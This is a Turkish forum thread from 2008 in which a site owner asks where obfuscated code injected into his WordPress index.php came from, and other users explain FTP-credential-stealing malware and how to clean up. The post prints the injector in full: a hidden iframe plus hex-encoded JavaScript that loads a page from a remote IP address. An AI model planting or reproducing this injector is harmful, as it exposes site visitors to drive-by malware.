nereden çıkmış olablir bu kod ???

Mxcoder · 24 Ocak 2008

sitemde bugün fark ettiğim bi sorun vardı.sayfa yüklenirken tuhaf adreslerden veri çekiliyordu,ben bunu araştırırken bir arakdaşımda siteme girdiğinde nod32 hata verdiğini söyledi.kodları araştırırken wordpress ana dizindeki index.php de aşağıdaki kodu gördüm

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v47978a149feed(v47978a14a0b2a){ var v47978a14a0e85=16; return(parseInt(v47978a14a0b2a,v47978a14a0e85));}function v47978a14a1a37(v47978a14a1e21){ var v47978a14a2207='';for(v47978a14a25ed=0; v47978a14a25ed<v47978a14a1e21.length; v47978a14a25ed+=2){ v47978a14a2207+=(String.fromCharCode(v47978a149feed(v47978a14a1e21.substr(v47978a14a25ed, 2))));}return v47978a14a2207;} document.write(v47978a14a1a37('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D65393639207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A37303730292B27643464345C272077696474683D373037206865696768743D3130207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

anlamadığım bu kod oraya nasıl gelmiş?acaba birileri açıktan faydalanarak mı yapmış bunu?şimdilik kodu sildim fakat aklımda bi şüphe uyandı.bunu yapan yine yapabilir.Peki bu bir açıksa bunu nasıl kapatabilirim?

Permission · 24 Ocak 2008

pc veya sunucuna bulaşan bir virüs arkadaşın başına geldi o siliyordu 1 saat sonra gene server de olama ihtimali yüksek

nokie · 24 Ocak 2008

başka index adlı dosyaların varsa hesabında hepsine bulaşmıştır, ordakileride temizledikten sonra (emin ol temizlendiğinden), ftp şifreni değiştir, genelde rastgele deneme yapan botlarla ftp şifresini bulup yerleştiriyorlar kodu. Web dizinini kontrol et, perl script yada senin bilmediğim php scriptler varsa kaldır onları.

bunlra rağmen hala ekleniyorsa servera daemon olarak bulaşmış demektir her saat eklenir sen kaldırdıkça kodları, forumda biraz arama yaptırrsan birşeyler karalama yapmıştık bunla ilgili

TurkOyun · 24 Ocak 2008

trojan yemişsin sitedeki bütün dosyalar gitti muhtemelen

sonsuzhost · 24 Ocak 2008

nokie' Alıntı:
başka index adlı dosyaların varsa hesabında hepsine bulaşmıştır, ordakileride temizledikten sonra (emin ol temizlendiğinden), ftp şifreni değiştir, genelde rastgele deneme yapan botlarla ftp şifresini bulup yerleştiriyorlar kodu. Web dizinini kontrol et, perl script yada senin bilmediğim php scriptler varsa kaldır onları.

bunlra rağmen hala ekleniyorsa servera daemon olarak bulaşmış demektir her saat eklenir sen kaldırdıkça kodları, forumda biraz arama yaptırrsan birşeyler karalama yapmıştık bunla ilgili

Bu tür virüsler genellikle önce kullandığınız pc ye yerleşir pc deki tüm .php .html vb.. dosyalara kendini yamar aynı zamanda pcnizde kullandığınız FTP programına kayıtlı ftp user/pass larınızı çalar

siz sitenizden virüslü dosyayı silersiniz ancak virüs ftp bilgilerinizi çalmış olduğu için uzak bir serverden ftp nize bağlanıp tekrar ftp deki dosyalarınıza kendini yamar

1. pc nizdeki ve sitenizdeki tüm dosyalardan virüsü temizlediğinizden emin olun
2. virüsün her yerden temizlendiğinden emin olduktan sonra ftp user/pass ınızı değiştirin.

MéDicLiFé · 25 Ocak 2008

Bak benim başıma gelen olayı yaşamışsın ve aynı kod ikiside sanırım.
SQL İnfecte gibi bir ismi varmış bunun ama tam hatırlamıyorum şimdi.
FTP'den yada PC'den kaynaklı değil.
Genellikle SEF yada seo yapıldığında meydana çıkan açıklardan kaynaklanıyormuş.
Ben çok araştırdım.

sempaty · 25 Ocak 2008

mediclife, bahsettiğiniz farklı birşey. sql injection ile de yapılabilir bu tür birşey. fakat bu, son bir yıldır (biraz daha fazla da olabilir) çokça görülen ftp ile dosya değişikliği. ilk yayan site yanılmıyorsam 88.cn gibi bir adresti. bulaştığı bilgisayardan hangi ftp sunucuya bağlanmışsa ordaki tüm index isimli herhangi uzantılı dosyalara kod ekliyor

sql injection seo yapmaktan kaynaklanmaz. yapılabiliyorsa seo'suz olana da yapılır. get veya post aracılığıyla değişken alıyorsanız gelen veriyi süzmek boynunuzun borcu

yapmazsanız tabiri caizse yolgeçen hanına döner ve türlü zararlı kod eklenebilir.

MéDicLiFé · 25 Ocak 2008

Teşekkürler bilgi için + rep.

sonsuzhost · 25 Ocak 2008

sempaty' Alıntı:
mediclife, bahsettiğiniz farklı birşey. sql injection ile de yapılabilir bu tür birşey. fakat bu, son bir yıldır (biraz daha fazla da olabilir) çokça görülen ftp ile dosya değişikliği. ilk yayan site yanılmıyorsam 88.cn gibi bir adresti. bulaştığı bilgisayardan hangi ftp sunucuya bağlanmışsa ordaki tüm index isimli herhangi uzantılı dosyalara kod ekliyor

sql injection seo yapmaktan kaynaklanmaz. yapılabiliyorsa seo'suz olana da yapılır. get veya post aracılığıyla değişken alıyorsanız gelen veriyi süzmek boynunuzun borcu yapmazsanız tabiri caizse yolgeçen hanına döner ve türlü zararlı kod eklenebilir.

Tebrikler mükemmel bi cevap ayrıca apache ftp loglarınıza bakacak olursanız ftp den dosya değiştirilerek yapıldığını görebilirsiniz.

nereden çıkmış olablir bu kod ???

0

0

0

0

0

0

1

0

0

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5